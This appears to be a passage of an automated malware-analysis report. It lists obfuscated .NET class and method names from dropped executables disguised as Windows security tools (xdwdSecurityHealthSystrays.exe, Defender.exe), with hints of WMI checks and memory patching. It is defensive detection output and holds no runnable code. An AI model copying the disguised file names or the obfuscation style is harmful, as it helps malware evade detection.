                      Source: FixerNerest.exe.0.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                      Source: FixerNerest.exe.0.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                      Source: FixerNerest.exe.0.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, jzPbPTOKMYzy.csHigh entropy of concatenated method names: 'BvqjRKKKxZ', 'uDiLLLnYqoyNDjxaBj', 'wrmnqWmDlFvylaogMkC', 'BkbHODinAUkJbTciHPsoYHCSv', 'MmOCkpyjdMQfZnozDQVlXS', 'GYxsNbthILYqvZxjuKrpQRcqF', 'ZElxJSupIe', 'xkIkeITAwsaGhaafcgowHm', 'BowLBFwFQTwxZi', 'mJJpIHzxEXj'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YsWKUSVaFowa.csHigh entropy of concatenated method names: 'tTvXthIVExoTsvxLtZ', 'UtwrBhuHZMwXhFxGlCAkunm', 'vhqbXXOMOCFiwbtp', 'ajIHaHOvoMItpzhHbwUrSjByk', 'ezPJJJKkTDdM', 'acfiKFTZDYaUeZyh', 'iJXRcOgfCziEfddPbtOmBrs', 'iabooejMDcVUpDx', 'zCHFkVYvxFDfju', 'qQGiBmsqYPWBDHJaXvAnyj'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, BElgoLHogWQNwYHuUgCDSGRK.csHigh entropy of concatenated method names: 'baJZzPuRxNSmGjUn', 'WwdzYoCecRRlcvn', 'LNlxOgGVwyKpHOwiPA', 'VgVDlHuXycgVReLuWjpDp', 'HDZeMXNUjVcLStqJzqUIIt', 'dsKvTayZwufZRe', 'uXKetLtGMREM', 'yighOovmCbttlvfRmUZfr', 'xyezEkmydPNOaONyKdiVrvQk', 'PNoZxfgsClhC'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, xqLvAWoeLo.csHigh entropy of concatenated method names: 'CdUisxkdFkFeaDfLWDmvGKKb', 'BzDhNhZlzFIpfXjDqWRsL', 'rULSaZsqrTsxqxhwsCfsb', 'XWqgDsPosiYRHiWvHztJNowhg', 'VtePMSIswobuWAaDaJYYp', 'awvfzRliaJzRXVJdWFIPmhTMd', 'jJOmJHwWThTgTrHNOSvFdEu', 'nSQaMtdiCGibUnzrVBCcJpmRH', 'SBRYPfPRyqrVJaDle', 'JftaSDjbBRmyg'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, ETYzyWSLPrOWhkiLrBuXTiPY.csHigh entropy of concatenated method names: 'oOWCJmYcQnvjThiXoz', 'ihhMfqXbAabVEzYJI', 'JFEqtQwnbXULzejrptHBrLmL', 'CpSrkuXabftSsnQPr', 'zGoawmMJeCGFxT', 'TrbevrdxlYzpYxGqmzxnEib', 'ffaQUTWhaZZvplwXWJDCxwn', 'YMUFAfokPiyQR', 'cSCRPzYKBBCZR', 'fZvirOsIyQhukogGmgGJglAg'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, LRPADrZpfFFGcDsfIXCuiNHyQ.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'MVeqnrHUVu', 'JPRxKQjqNiQvhhLWOJIH', 'NtWrdHcWXWDpoPep', 'ZGRNcTvawIbVsLMnPvWvGhI', 'TpMNGsRhgWjB', 'FkaaRgzBBeKqCZTHtlrxKu', 'GiUDrtoWbKxJLwVpAJFSL', 'WDTyZmksEe', 'yTrxcIHMHifFP'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, PthsnsfGDgeBRScSJU.csHigh entropy of concatenated method names: 'WPvtoNyDLTEGaSogXzMEc', 'kzIqtnFcyd', 'EDdQWEFDXUaxCBQpXUsAf', 'VfvlxTKxiVbT', 'PLQAvHAFgJCFocyi', 'GcHvhxUkGltZ', 'EVjfBeGTwseCpVtgIqMPa', 'zMahNwQoWHgvEg', 'JbTboJkctscaExug', 'KpWWETQKDIWXW'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, BtukVaynkFNDYhxzrBxPukEK.csHigh entropy of concatenated method names: 'LDSFFMGTtUhoJCk', 'sLtZydnlXBapozRpkTKX', 'iftHjeNQKhzMhCYKlRh', 'hhDmQfuDrEprNCJ', 'ARPyZUMUacGwsfyCdGx', 'bHqEkJYGrH', 'essJTCiqMVjLoYxLMFnOGFJEs', 'KOQwFcTdcEzVfAuQlf', 'wCgmxLBEtsZjoRtrUZPPGrL', 'tMqanUqUdLwYecSlEXakCVLE'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, RBUgQcjHqRKyAa.csHigh entropy of concatenated method names: 'LEZdqsNhpolJzZovnnEEjVKsk', 'dNRuNpUSUgxp', 'VETfseTjhBW', 'KvVPptgskOzQubwoh', 'IxxijAPqSNQ', 'wMuWCtzCfmQwUGED', 'RifCcsZacMVzybScNSnVY', 'CoeYVhANcvLGBflUT', 'VvZhdDhLxUGoQiM', 'fqYEWraOjZnranqtzUzczUK'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, nKgpeZgSTykSYtSbbSV.csHigh entropy of concatenated method names: 'wDxqnrGACQoWOIdDYryoSu', 'fvaMQMFUkvxj', 'NqBnSgQCKODPQODjTgXBu', 'vNfpnxwEaRYtqip', 'WmeGVgWwAxClQ', 'ZipuvnHcsSGGnm', 'XYVuIKkXoxOripqvKnMrqDv', 'BDttLzPtjGdYgqIEpKBxgw', 'mCXvSbuzTdisEQrLo', 'UHcLROUfHCfCyGFfGrnE'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, KUSnSKgmYFGAeAocidYkujJO.csHigh entropy of concatenated method names: 'dQTkcSfTfReMTMW', 'nbVGmtdTwMWaBBaKDUp', 'NCwnahzjKPORBEGInIgjnznQ', 'FRdqTJzXcSlfifFutJhxFYwv', 'XvoFGNOfrVPVsrG', 'tYmVdFcbptqGSr', 'UiYwNLRWFWzqKpYBRajL', 'KaoSTMQMWINAounTvtDcBgydO', 'lQsYfjfhKIjetyA', 'iOmqWulhWhfiy'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, QUoppAEiUBFBpPJBwNJfiPqyc.csHigh entropy of concatenated method names: 'XCJldFJktkEUIpCWsEd', 'VqhiakofQAepMKcCYjXArEW', 'wbFUcMXlVkJgUbLtQ', 'UsGPHxNAxJgdAQTIlyf', 'CEdsUcAvhxYejMke', 'hUHGcOOErjsNMpM', 'vcQONvexRSAkCt', 'gppDeXNZpPncsHiVHLQnkT', 'EmpKpJNdCywMXW', 'ipiCazaSmpixsZmFDNZkR'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, telTuMtmMwDpKCkMfRoN.csHigh entropy of concatenated method names: 'rIpEftCdsi', 'wFYJaLGHcSGHka', 'HsDemLphCVvPOTqI', 'NptFeblULhkjlAEd', 'lKZNwCHXWnevr', 'lJltvhPdRRKadExRUrmDhg', 'GQmmhInHYUtyazGIvwIs', 'CWYCaESmJnFF', 'fdJvhUdKlFkFXSOiqH', 'naDuNjHDVUPhntyTd'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, sMngcJoYCfD.csHigh entropy of concatenated method names: 'NqoQEpSsTwLvYLG', 'xShVFAtygovIPJLQgVcbDDWW', 'slwAsIRDrakyhLMxpjPu', 'dKlvODjesuvKn', 'OxyogdEXiaSyJP', 'OTHcXObKFdFiZzgonux', 'zrviQGGcKdQtTAebnhQynmsKb', 'fYBmeELReWXYMQIzAcMLOZUF', 'FdzKMykHUb', 'aYyMhCVHDPVzqomQyPhF'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, dSDmXFmcLQpf.csHigh entropy of concatenated method names: 'ziEklDxOoeZAgCB', 'dMTBarzvetSRkatBLDS', 'snqYEtpndmqDlxhEVdqHjJFrk', 'dOlYockDlpWvwgCLSsC', 'fmspfiNKNjhynY', 'bCFyNThLshagJF', 'rNpUAqVvsGPZpBHXH', 'QaIMtowybAHFBDEps'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, tGwhiEvIelEIF.csHigh entropy of concatenated method names: 'qbVYeRUeKDssh', 'pMIWvEsBuMeRjSQsQVFHT', 'oFjNrOwtopXJTSciMBTog', 'uMiCORmWmZSD', 'CmiNdFBXotZyyPiIE', 'eFfLXfoAeGRCxqQuavenpi', 'lFSIEPBDNikoxsrPCYd', 'uFlvihEpneQzvauFEW', 'lcCDUMCTCigbPMHkfTWaW', 'LQjRlsXxmKgor'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, bemziMhmpmMerLdV.csHigh entropy of concatenated method names: 'yWKGRtOTIcUqxtNSNbPM', 'VlsSCCkNTeEwH', 'asNKkYgakMwrszLdjNJ', 'clSoOreFoxQtpOmZ', 'RfoevAfVKJ', 'CquqnmCpaYvttbmmwDCeM', 'cSiUrhknSEhtDyDZFDMxz', 'VmuCINiRIfYQOcITvV', 'mFrLzYojXyy', 'OlAwvZoYWEBvCVm'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, mDQHYyyDgioFBJZV.csHigh entropy of concatenated method names: 'yJRtvjLKoz', 'uGmefcsTfwexqBNYFzT', 'CsUetdcqUExkzUJawJZZQFpE', 'MbrhLGKUDbBlIlCz', 'zayuyWsnbv', 'ufwCQKgBkJIynPwsIo', 'XXZOGPFZOFztjKkaYeyVxE', 'PtqcLfCdjz', 'XCUQqnKkSwkPZnDoYOKTqT', 'KVPnuuMbQuvnhFHnK'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, GwWhqodDdzluu.csHigh entropy of concatenated method names: 'IvIOGuRhWYFMuHjkQGxan', 'HaLHdRFAtRAByccwKJtZa', 'betVTtifxUzXoiDzRzbVeoLtI', 'ITvngOKKygNH', 'MSOUfCbousLstxESmTAMMlOjJ', 'kMdjWlJBODQUfqhSNbkunR', 'rMNNulbDfKs', 'OKKWairiBCSnKfu', 'nzPATGmXIYPQnAlKn', 'SHCEJLviEptaDOrEP'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, KZBUhkwxZIxgGTHyBUdIA.csHigh entropy of concatenated method names: 'qihQwZMWKRbXaA', 'vzbnqyYoZdKgkd', 'hekvjSnQoWkDygEi', 'GlGVCUJQRuInlscsokxnfRu', 'inQFuaIUvRay', 'AfKbfRYedCdIKJvHv', 'pqxmOEEVqlosUS', 'VoFnLzzVdElmxjRMMzD', 'HZNQGXKbmqliKepVqUjOq', 'ThdRGlZZcsQiVvao'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, yPMoFGhLUJIDtqrdoF.csHigh entropy of concatenated method names: 'AvNubljotLBITSjnNSJvirWcI', 'HgspljehAflVlDV', 'ozSAolKCeLeJRJZ', 'lJeCvDZRdmSDCrgFZPDWJ', 'dVWpKaEUPqGA', 'cZSWkaAXBSGAmeYjBFCb', 'fIgGtzNIWbxBIEgGsTw', 'kbDQpYvflNlE', 'FwRmQranOfrIzeZsd', 'mFStEFQQUDhX'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, MKCDlISAepQIcIwuZXoEk.csHigh entropy of concatenated method names: 'nHEaTzoWxQZ', 'AFjLdhQolFyaNVhcozCG', 'IXuzKpTMHs', 'jvIrKOuGnv', 'hJdNyRMiyOTerho', 'TsxcdMyrRMpRZ', 'vSGqplVwqBz', 'tmQRRKVCaNqSoVKmv', 'bvJtSAYBrDqWCwcESMbAv', 'vWdhcoBUajAEZEPATPs'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, iEyzZzYuVgHBHuvSVDszSVn.csHigh entropy of concatenated method names: 'DmzaqXtfORSlWFCGyP', 'lfPhiSWydevaNQWwnzxExmcnp', 'JwQAlBCYBwnFRITZQB', 'rFUAJPGAKzzDcrG', 'aicsuXpPaIii', 'lYWbUyWovHlfBrYBtKNLzs', 'nIYTQFZAhXLZbdbItjTearM', 'gQNhyUXpshjSvfGjWHDHqRx', 'RCTcfNQvvfmzrsCMA', 'gtuJMOckITnFCOTp'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, DablsyKhVktwZXmMx.csHigh entropy of concatenated method names: 'GJKVxgQvPV', 'ydsOfJeQCVbYa', 'jderwMUjgNj', 'hdvVwjoVWGAitO', 'vuhfkkRNDlDS', 'sOwefQcBVhYr', 'FiccwyhFZpziyfQPrjtQf', 'HKWCdmGZMInzejlbpF', 'ESZwwglLleyfbFcaSGtUv', 'zcruyAgeQunfbKhNZWraUvOdM'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, IGWfOAHKzj.csHigh entropy of concatenated method names: 'INjbkoTBDyDO', 'wmyuTvpUiWQ', 'AqsFUenQBM', 'jQbBhUpDFsQjcCMqDunZrTYk', 'bwjUQxEkrOeruIAtSLKjHQCIo', 'WOmDPsrEFYFjpvLyknhzJ', 'nfYHNBqLubgfaqxoymzqC', 'njWPXIgOaoblaGeIeq', 'udeDJVVBvovzTj', 'rpkydhffArEoP'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, MLOzRvMQYDeslGhSiqRrD.csHigh entropy of concatenated method names: 'CNbGrDSdnbyQMNsuzSIDmHHwh', 'OvZLrOhNIBYL', 'IyuQCtVtTZn', 'zizMvGeYkpWEckjizFqVoOA', 'rrECLNvVlUr', 'hBNvtmSTbqoSJnuOjSC', 'iuUDBcMXuBSHsEBysvbCv', 'eBDltYShmTSGwngJtRZ', 'ZZXgaFmwVnqAqCPSzPjnENPz', 'mHNRiCJczHEeWLnmWLzcSQ'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, wEmPlHwvhkVaXVXBaeahaqAX.csHigh entropy of concatenated method names: 'mVGvXKixJGKPShLgxTQRR', 'DSxNmbKUFEOd', 'lqAJZncNPNmHwPAcXkGTdSoxK', 'GnpAGApjZqxJqeown', 'LFpMJriUIJV', 'CCzBgpYPGlSNpKfO', 'cfhejlEiudxSmsfNGouJpxzX', 'yamcXzMTageopTRvS', 'LaxUtnzjVlFEefJGlLSGW', 'kyLLAZQVdOXKnxbdgzc'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, VyUkcpVGFrRjScwyVUzGJWx.csHigh entropy of concatenated method names: 'OePLlmVmuhYaBYdb', 'gqiCsQpYwtMwaj', 'BxVxZJVTVeolEVwxrXrcgPUVO', 'notJpUyZZECfCFLXMX', 'fkCAwVYiGSl', 'AjzWgZMpUnewsuLVmRI', 'wRjpkownQm', 'GnaCwCifxzijrFGHBKDwpKj', 'iAKlrcZYivYIRsPTElKC', 'hrjegvdNpCwEtT'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, wdeXDEGcBGXHfb.csHigh entropy of concatenated method names: 'jqVCxngNkCJLbpWAhWqYuD', 'xyOjvRjBjAzlFnTqcQPtVutem', 'GploDvgqXDiDkvBAZLb', 'RMOfNIfJeCF', 'xQLtQvwEFOPPHZfTsUVhC', 'NtbFavQWMUxzGUkHkeOX', 'CxyYocLRKhXhODRSKUBoiCuSI', 'LjljqTfjLwdhlSE', 'BnZRrQTpaJN', 'QzCgPWRcgaqEBfsUpcii'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YgTRUqGyvMDPAwIs.csHigh entropy of concatenated method names: 'fLfZnpCMphhn', 'QYIhRtBHNJYx', 'aZFOqCvjkyFwkrREfJYK', 'vfHTfOrARCGcHOcHbqesZ', 'ZDkgCjCizznueuyvLnDj', 'wyUdcoxESuSNOFD', 'yMIyiCHpNkiIgfqoqOdF', 'DavFehFUgPouMMb', 'ljtqfQrFoYnDdXAbxRumMsEU', 'UgVtNTSPsF'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, rLSyZeyiGXQodFFJuqzb.csHigh entropy of concatenated method names: 'jiyzoISeTlwlTJHcrob', 'USYqMKRKXONmGEIdT', 'kWfDmmUCJvyhCCXCIQJHndrHH', 'XJeOBdItDFt', 'fmWJBVMqMKPDwrT', 'LGfXvhOKYuuUY', 'ySJrkXlecVvR', 'NuaSKKwiwZWWyXLlHbsRDMx', 'FGwbheKbdoBQxbkKcbBtmUmA', 'sUuCAqAxgNDNVASPu'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, UsOroEkJQwDdcBlH.csHigh entropy of concatenated method names: 'tZXWLhbpGPMmxia', 'gBfOIplZEVfpAhsPo', 'gTNzJKmBhpYXSO', 'DvzGsJEoySqClpZWwxj', 'GMhsVbHHwA', 'CRLwltJwEbePhTIBLISc', 'jMWrOHlQCwrxkolZt', 'dmAfabwzYMavzeYHTFpEWl', 'gCfnSxfWbSUoqYDmu', 'PiYpGwNYcUgkpQsNUduoeCtq'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, OdvZLjiZSxuvnfJkBWEwenrQv.csHigh entropy of concatenated method names: 'fijjjKQXRKunlovkWbVST', 'LZySRCSamfdbDzqjOj', 'QOzqOlQAtRPudQCWKkQ', 'NEqXPJJkwumNlnDOMjkhBCZ', 'XkAKBcgzxqRL', 'cbFbgDyeBJpNnKbAj', 'LehAeIziTOnQvWrqkIfFVya', 'VbKwNSFzNyFgqcwwcxk', 'rlNTWxaSVeWNEDeCxCUBJ', 'CwQKAHLidYNqmjOraQrmdj'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, GcBxRdNtfCWHQtExiPKZUa.csHigh entropy of concatenated method names: 'UoExhHdtqM', 'UOdaJDZllFLdPIOCZ', 'ESTgchINgf', 'CJgurZpUIFGAjovILppSE', 'qmuFomvRwXt', 'iwfiXjYiQx', 'RkrgZxXqMgzStzlkDYqIiHiFy', 'cRGuWmspdUwFWUYggT', 'dmjmyVKapOKCmiwUGkSK', 'ZEWQoxBWjBaOV'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, lQeQOakgBgLnYzXnYfwvsoR.csHigh entropy of concatenated method names: 'ztAfILOSPvBxRhPeW', 'MOeRMzlJYbiMAxz', 'RUaFYpRtYdy', 'WrPRZbbCvihAtymmk', 'uExMQuEQsX', 'ksiBLnhMQnYVxJimZMZCeIVit', 'JaUNIjEFKpyzhLFaUO', 'iADiIeETUScXAHje', 'rCfpRrzsnaeO', 'DoGMLbGsMiDQjmiSyrxhyjRjg'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, QKvpyubntApnPp.csHigh entropy of concatenated method names: 'hJIcmsLfiJhZvvAbDBp', 'EspKISPavnCRQTuIAPHUFeMfR', 'fssYmmasapUyUTdk', 'vGQIcAsanuVsafJtmmWhX', 'QrXtFoCunr', 'uRZAMDsAxysEAAJK', 'hgGDNtqZliv', 'YsGdXfOksaj', 'hZDYmWtvexNGkRhXjba', 'xwZFlbcUvaMHxcVo'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, UyrKerXTOPAkHBLRj.csHigh entropy of concatenated method names: 'xHcODEjHiYWqy', 'EJpsKwGfhupd', 'CWdwiUYXYwGunaX', 'zwXQtgyMSHnF', 'aiYamglEcoWajfM', 'xWVjWixRMYWYRdbhSFyO', 'UBulEWIBpJBldVkRWvrk', 'NNKMnyMpHegy', 'cVbxSLpQXO', 'moIqPwJGdaGnkZQY'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, DyVsvFOlHVfMrKKxFhxnMGPwa.csHigh entropy of concatenated method names: 'UOBIcuNOdorNUcDDOJeNW', 'qYfMcxmwjYSJ', 'zjzslzdhWFsNVkIsGRNPM', 'ccPRPbgETvKrDUPQt', 'taUTnzHNdEdHFu', 'cGWdTkCARmxCdhocp', 'zVlDJpQJCxcbMpQSb', 'snadrZDgqxdgpb', 'jFYnYxhMJhEYpaHmKFbkBx', 'eLzczTgVIAncjrfC'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, ZuoBsZuxQp.csHigh entropy of concatenated method names: 'SHBkDQrVYFDLTTvsBYvfZhpj', 'gYWmBNPyZhN', 'eYHZjmwWjUiwgs', 'UKVlSRfWsUjXsoNul', 'eXAnGpvsNVMqZFIouoEv', 'wyBPEAPEhWawOBVYhDgqZEKK', 'vdPEtYqpni', 'yXCofnfzmtLDmPNkX', 'VrorOIWAAox', 'GaTxaJBrKlYKXHkacogoS'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, EUTyJunaVjfLziLg.csHigh entropy of concatenated method names: 'eegtQQmoHQzAznEMVfEOJG', 'mpQAlxnqMRkwy', 'boDgKBdnaWv', 'yeCGRgXTuEzQBqUZmj', 'rGItrBizEhyPuE', 'yIoFzEYfJXome', 'hEAqHDUqkLFihTmv', 'FMrrLlhjKTbyWDODeXcxYm', 'qIYdzRWFsN', 'iancWTTHxksrOIrfCwJy'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, bRFnUZCCzOQQktsWRhAHLOd.csHigh entropy of concatenated method names: 'TGSpzALbonWVUFvPhnynv', 'aYLwQxxWgMnTUO', 'MCzCpbwXWCLl', 'aYPqqEfteDjNeSHJiBlgI', 'lzkGndBotELMvIxw', 'PjOhyPoLIpOoBaEbFm', 'GkRBrpKfBRXyMlY', 'xunnjvueonAsdHkq', 'gqsxhWrnjmulqBCc', 'GhRzhKpmNDp'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, kvAdeNHhLAvFBnSPLsjXnmuh.csHigh entropy of concatenated method names: 'KkybJPQqfTa', 'wipTLzNCqsPo', 'CNYRIyBSZUdIGClePVTrGOJtE', 'mhfNRUKeGBsYXVZqXO', 'KExbXbXvwqoDf', 'gLTnMCIybvkmq', 'ySQqvguXpGImuZNoSxMLrJFCL', 'DLcBqkkYxdaxI', 'SIWNfZIjlndnaeHpNNfjdjuoP', 'BWbjNUoOtinsXlDUa'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, ZAbCfCqEpIJbZTdz.csHigh entropy of concatenated method names: 'lMkuXZVQmvhalwPheBIO', 'CtuNkNjquMbXlNsBaCaF', 'sHJdDMtuuRVlziTqhmMla', 'iFDAjXgEzhIxKmkjgAqvzuG', 'meYKtPOTLzYEaDdWOpSnc', 'YgGxFLveso', 'ROEyVKjTolKOgJdWUhKcSJkGs', 'wKCXgGkFJpZ', 'sfiUnQNSZncpbwiLf', 'dxGROZQRFDeb'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, iVqXiRRWbtTaFgrOCj.csHigh entropy of concatenated method names: 'YJwawjgILPSRH', 'bbkjAnvjKbzCCwZtLGH', 'VTlvtnCJFGJcMudE', 'fBvPpyVauhji', 'ELJnKHqppNkleES', 'pISUmgFMEgVQUzFSa', 'CxTZjWOSqnLdLtDDFZQOfY', 'xjemaVqHSLq', 'UEQYwFUpRA', 'UbMRugBMHerVpFjoxz'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, BeNEQBpvCUYMUQvO.csHigh entropy of concatenated method names: 'XmhJotRMrlZrDmPUAPXFV', 'FfmVReXiQT', 'fdcMNMlvsYQQ', 'zhJsTAXIPVg', 'WTbnoJVGjX', 'mHnCmKdepPjV', 'UfOPvzQIvKqtJHDOvJTcY', 'kgykxlqrmnxrTJvFK', 'GArxwIcDZPtFPtLxuhQLB', 'RDXDwSouTpzkVYfnjpH'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, XvtqplFAmRakHnvLtpT.csHigh entropy of concatenated method names: 'pvkIPFGCSkUuaiSakf', 'DDDjqbzHeeclvgGp', 'KkakfDiBwfKYVVbOUQ', 'lMtgQxbXqzZOUsrPz', 'kYAUhuvpjJJ', 'WbQjDPQDJn', 'fsCXRqgdFbI', 'rWRezkbOROpcxxlobyvvw', 'UcfWeyCgDYOrYMml', 'SiZmRCaZTErBGfN'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, YCqdhaRTimJInloXKuRkyyz.csHigh entropy of concatenated method names: 'uMCOJPwusgMn', 'PTXkYSNOqJWmprPoquZDj', 'VYCJTqPPHYBluatzagls', 'CfcUXhGClmj', 'gyzhOzXzbB', 'kDxovrUtSrfSsapvIJNVlRiNc', 'RMhOtcAirQatLKQtRLAfHHYD', 'pNgLSVjLBZIMEx', 'RKjZVPxCEs', 'XMxmKndzDO'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, FeMXZbEkIGjJgevW.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'SWUgQdUHKXCuFjoLy', 'roZsWKRBZOrvYxlj', 'OvZynxCHmSjPwJch', 'PJyZAKOPDFP', 'zFJWOaQYWErWkj', 'hldEPNUhbkvNlLjjrnsnNat', 'jMJhLSbpQSgdaBzBeXil', 'MeNnUzirweHsvVD', 'mWIJFxTeGJq'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, DqloyPCLKAxwlGUiNTrkNgO.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'gHevnUUNJwNuWDCjJuZrjVqjS', 'lOeaFCHQdWAhvAN', 'AQZpTbUtpQex', 'KRucUiFjjqLmFa', 'ibyZeaVZKdyKulkoXJC', 'FFEbRHYQZNDOBpK', 'SFTnprkzVYLyzB', 'cDHadWXHWCEAwakJFaWWRq', 'dOUFFtwZRXZaKt'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, FaWSNiFOezDcTYVZCPLVUHimA.csHigh entropy of concatenated method names: 'aFVOrfwcWXAYK', 'QIRzuExzUkYGtUfysk', 'AHztQIYfqCyYeEj', 'MqirvPallpk', 'cxYfQFKTROBrWYGwVLuCK', 'SHJsWkhOHaXnDt', 'THYuPnxprVXJdPavibN', 'QVYjZmCHbUiVNSCDWHu', 'USRWzbDyhfpMqNNxjp', 'dkqNWnBvLNWYagkK'
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, NmTBqnwpsuQacpSXxPF.csHigh entropy of concatenated method names: 'xuQERGGdzsmey', 'cVTmmTFkOSqSyIviF', 'ZXhTWOjjhTp', 'IlbFMwDLcm', 'MfxNzHxhRmh', 'apJzFCCmmuO', 'EqtvyeucnRVnY', 'kbjmYObhAP', 'xyJZzTSRnI', 'OBimsERJUWaE'
                      Source: Defender.exe.3.dr, lXExsaLrgYgEOOXK.csHigh entropy of concatenated method names: 'UwIbcfQhBviOX', 'cHxslOlqBYCceRobCYTdkZ', 'sJroPreddJ', 'ExRVmvaevkZzBzsZtJvtC', 'FFjtaVzWuZ', 'tMqKgmXDGeRTJqp', 'SlThPiCsLlsVFfYpz', 'ImBOMWYqvXnlaDlyglar', 'KKyyvuBxbFb', 'ciCUDZwJZneFaLpk'
                      Source: Defender.exe.3.dr, kInYBznLcEoeuDSs.csHigh entropy of concatenated method names: 'yWUqFwYbPOyiIfALmotlTxK', 'HotTDfGtAOhQjefMP', 'llpcTYoSIOZGWAMxiQCEYjHEi', 'yjcHJgWWMZheVUekXsTtrgDl', 'PKKYCdkuYaEqAEsjzonPDvhZ', 'MOkoDSgqLuWMxJvwkwuZtW', 'bKrrQWsTclkpOAGVIYAoKW', 'BerTTzmzuqbJeLaPU', 'ataNUgweamBthdE', 'pNYDZUplqznqbKiJgWjdw'
                      Source: Defender.exe.3.dr, uJXvYHzEhxLOfc.csHigh entropy of concatenated method names: 'SNWxJjZpddDWZAUIe', 'dlfCzIGMwkhjbfRrwqr', 'seUTuRVlaDMphkC', 'uPOOrxnoHtCXEhEeRMmzQLI', 'mVlsYsCqdaxgcdavqfMA', 'xgsziYVyCaiHfb', 'LvQPrLuekYComqIl', 'HUpottpUgsazPYwBEjvOwJCDC', 'agjiHupiALlg', 'CauKTTeVAFmhGMW'
                      Source: Defender.exe.3.dr, vTsoiPoBagCkfnEE.csHigh entropy of concatenated method names: 'AGXlggLTczEETmLnHvVvVfz', 'mWyAVsqBZzpXkkPmgUG', 'kxGurwXriJVUHrz', 'iLyjICeTwnCWg', 'PAZiupPEJYUySQeVQtlE', 'VVWHiSmxDuA', 'zuUuYwJudBaOK', 'OpbXJlbeueDbMWdHGeUn', 'WKarwbKbTvHxyEx', 'fkPjVAprxknRWuwu'
                      Source: Defender.exe.3.dr, OwtFvyBkOpRRzc.csHigh entropy of concatenated method names: 'DCLFoZlKenZ', 'CgtqbJuoLKkbarxoqh', 'DPnuJlizndmPSVVyDVyqH', 'ottRkewcwTw', 'VNPmkFsKHL', 'uSFFsuTsreybuBsAE', 'LgTSRzIjQl', 'yxycUyyfZDhdaFWXlVkrEnH', 'eFcBGwJdizthAyZDtVfydDsN', 'bXOgtpKpCyPWwYcuEvaLpXmv'
